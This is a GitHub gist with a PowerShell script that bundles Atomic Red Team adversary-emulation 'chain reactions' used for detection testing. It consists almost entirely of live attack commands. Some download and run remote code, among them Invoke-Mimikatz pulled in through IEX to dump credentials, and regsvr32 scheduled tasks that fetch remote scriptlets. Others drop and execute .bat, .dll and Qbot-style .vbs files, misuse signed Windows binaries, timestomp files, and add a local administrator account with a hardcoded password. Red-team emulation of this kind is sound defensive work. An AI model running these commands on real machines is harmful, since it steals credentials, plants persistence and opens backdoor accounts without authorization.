Created
July 13, 2021 13:31
-
-
Save pmichaudrc/d05f227b09f6d51b1ced4b2666f17209 to your computer and use it in GitHub Desktop.
PowerShell script that combines the original Chain Reactions from Atomic Red Team
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Invoke-ChainReaction { | |
<# | |
.SYNOPSIS | |
A single script that combines the original Chain Reactions from the Atomic Red Team project | |
.PARAMETER Reaction | |
Specifies the ChainReaction to execute. | |
.EXAMPLE | |
Invoke-ChainReaction -Reaction DragonTails | |
#> | |
param ( | |
[Parameter(Mandatory)] | |
[String] | |
[ValidateSet('Argonaut', 'Cyclotron', 'DragonTails', 'DragonTailsSafe', 'Fission', 'Plutonium', 'Qbot', 'RBMK')] | |
$Reaction | |
) | |
function Invoke-DragonTails { | |
Write-Host "Starting execution DragonTails" -ForegroundColor Red | |
# Tactic: Privilege Escalation / Execution | |
# Create Scheduled Task With RegSv32 Payload | |
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/6965fc15ef872281346d99d5eea952907167dec3/atomics/T1117/RegSvr32.sct scrobj.dll" /mo 30 | |
SCHTASKS /Run /TN "Atomic Testing" | |
SCHTASKS /Delete /TN "Atomic Testing" /F | |
# Tactics: Execution | |
#Test to determine if running as administrator. Thanks to Flare for this function https://github.com/fireeye/flare-vm/blob/master/install.ps1#L249 | |
$currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent() ) | |
if ($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { | |
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" | |
} | |
# Tactics: Defense Evasion | |
# Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c | |
$test = "Atomic Test File" | |
set-content -path test.txt -value $test | |
$file=(gi test.txt);$date='7/16/1945 5:29 am';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date | |
if ($file) { | |
Write-Host "Successfuly Created Atomic Test File" -ForegroundColor Green | |
} | |
# Tactics: Defense Evasion | |
# technique: File Deletion https://attack.mitre.org/wiki/Technique/T1107 | |
# Deletes File, detection here would be File Modification | |
del test.txt | |
Write-Host "Completed test of DragonTails" -ForegroundColor Green | |
} | |
function Invoke-Argonaut { | |
Write-Host "Starting execution Argonaut" -ForegroundColor Red | |
# Chain Reaction: Argonaut | |
# Tactics: Execution:Powershell, Discovery | |
# variable can be changed to $userprofile to drop the bat elsewhere | |
# TEMP=C:\Users\<username>\AppData\Local\Temp | |
$temp = $env:temp | |
# Note that these are alias' for Invoke-WebRequest. | |
# The concept is to see how curl and wget look in you detection tools vs what is commonly used (IWR, Invoke-WebRequest, etc) | |
wget https://raw.githubusercontent.com/pmichaudrc/Reaction-Artifacts/main/Discovery.bat -OutFile $temp\1.bat | |
# Alternate Ending: Using curl | |
curl https://raw.githubusercontent.com/pmichaudrc/Reaction-Artifacts/main/Discovery.bat -OutFile $temp\2.bat | |
# Execute the 1.bat file | |
cmd.exe /c $temp\1.bat | |
# Execute the 2.bat file | |
cmd.exe /c $temp\2.bat | |
Write-Host "Completed test of Argonaut" -ForegroundColor Green | |
} | |
function Invoke-Cyclotron { | |
Write-Host "Starting execution of Cyclotron" -ForegroundColor Red | |
$temp = $temp = $env:temp | |
if([Environment]::Is64BitOperatingSystem){ | |
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx64.dll" -OutFile "$temp\AllTheThings.dll" | |
} | |
else{ | |
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll" -OutFile "$temp\AllTheThings.dll" | |
} | |
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U $temp\AllTheThings.dll | |
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe $temp\AllTheThings.dll | |
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U $temp\AllTheThings.dll | |
regsvr32.exe /s /u $temp\AllTheThings.dll | |
regsvr32.exe /s $temp\AllTheThings.dll | |
rundll32 $temp\AllTheThings.dll,EntryPoint | |
odbcconf.exe /s /a { REGSVR $temp\AllTheThings.dll } | |
regsvr32.exe /s /n /i:"Atomic Red Team Testing" $temp\AllTheThings.dll | |
Write-Host "Completed test of Cyclotron" -ForegroundColor Green | |
} | |
function Invoke-Fission { | |
Write-Host "Starting execution of Fission" -ForegroundColor Red | |
#Tactics: Persistence, Defense Evasion | |
# This particular technique will reach out to the github repository (network) and spawn calc (process) every 30 minutes. | |
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30 | |
# Tactic: Discovery | |
# Have PowerShell download the Discovery.bat, output to a local file (for review later) | |
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > output.txt | |
# Tactic: Credential Access | |
# Add a user, then add to group | |
Net user /add Trevor SmshBgr123 | |
# Add user to group | |
$currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent() ) | |
if ($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { | |
net localgroup administrators Trevor /add | |
} | |
Write-Host "Completed test of Fission" -ForegroundColor Green | |
} | |
function Invoke-Qbot { | |
Write-Host "Starting execution of Qbot" -ForegroundColor Red | |
$temp = $env:temp | |
Invoke-WebRequest "https://raw.githubusercontent.com/pmichaudrc/Reaction-Artifacts/main/qbot_infection_reaction.vbs" -OutFile "$temp\Atmoic-Qbot.vbs" | |
#Test if we successfully downloaded the VBS file | |
if("$temp\Atmoic-Qbot.vbs"){ | |
wscript.exe "$temp\Atmoic-Qbot.vbs" | |
} | |
else { | |
Write-Host "Error downloading VBS file" -ForegroundColor Yellow | |
exit | |
} | |
Write-Host "Completed test of Qbot" -ForegroundColor Green | |
} | |
function Invoke-RBMK { | |
Write-Host "Invoking all ChainReactions, prepare for nuclear explosion in Reactor 4" -ForegroundColor White | |
Invoke-Argonaut | |
Invoke-Cyclotron | |
Invoke-DragonTails | |
Invoke-Fission | |
Invoke-Qbot | |
} | |
switch ($Reaction) { | |
'Argonaut' { Invoke-Argonaut } | |
'Cyclotron' { Invoke-Cyclotron } | |
'DragonTails' { Invoke-DragonTails } | |
'Fission' { Invoke-Fission } | |
'Qbot' { Invoke-Qbot } | |
'RBMK' { Invoke-RBMK } | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment